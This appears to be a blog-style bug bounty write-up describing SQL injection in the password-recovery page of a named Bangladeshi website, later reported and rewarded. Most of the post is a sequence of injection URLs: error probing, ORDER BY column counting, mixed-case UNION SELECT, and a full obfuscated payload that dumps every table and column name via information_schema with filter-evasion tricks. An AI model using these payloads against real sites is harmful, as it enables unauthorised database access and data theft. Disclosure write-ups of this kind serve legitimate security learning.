Bug Bounty at Bangladeshi Site.

Hello,

I am Shaifullah Shaon (Black_EyE) As Admin (CEO) at Cyber Terminator Army.

I was found Multi Vuln Disclose.

1st : http://rediact.com/(Another Dir)/admin

I was that panel Yet and I was Reported that Issue Yet. After Gotten This Issue I was Got 10K BDT yet.

Recently I tried to find another bug of that site after 8 Months.

Try to find again that url. After that the url are shown me 404 Not Found.

http://rediact.com/(Another Dir)/admin == > 404 Not Found!!!

Now tried again remove /admin.

Now What I Seen there. Site okk. Try to add “/login” replace with “/admin”, Now I am seen 403 Forbidden in that site. Now I just Ask with my brain, Something is there. Back to the site again. uri = http://rediact.com/(Another Dir)/

Try to Create a new Account. After creating account I don’t try to verify the account with mobile number. Now I am trying to recover my password.

What I seen !!!

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)&uname=(username)

Now try to sql injection there.

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)’&uname=(username)=> Error

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)’ — -&uname=(username) => Error

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) — -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 10 — -&uname=(username) => error

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 2 — -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 3 — -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 4 — -&uname=(username) => error

Found the length of vuln column.

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) and false uNioN SeLecT 1,2,3 — -&uname=(username) => 200 ok

N.B: Generally My Pattern to write union select is mixed case.

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) and false uNioN SeLecT 1,2,vulnerable — -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) and false uNioN SeLecT 1,2,COncAt(version(),0x3c2f7469746c653e,0x3c666f6e7420636f6c6f723d7265643e,0x3c68313e496e6a656374656420427920436c6f7564792056697275733c2f68313e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,0x55534552203d,user(),0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,0x56455253494f4e203d,version(),0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,0x4441544142415345203d20,database(),0x3c62723e,0x3c666f6e7420636f6c6f723d6d6167656e74613e,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat
(@,0x3c62723e ,TaBLe_nAMe,0x203a3a20,column_name))))a)) — -&uname=(username) => 200 ok

I reported The Issue at = 10th January, 2018

Reply Back Date & Time = 10th January, 2018

Bounty Date and Time = 18th February, 2018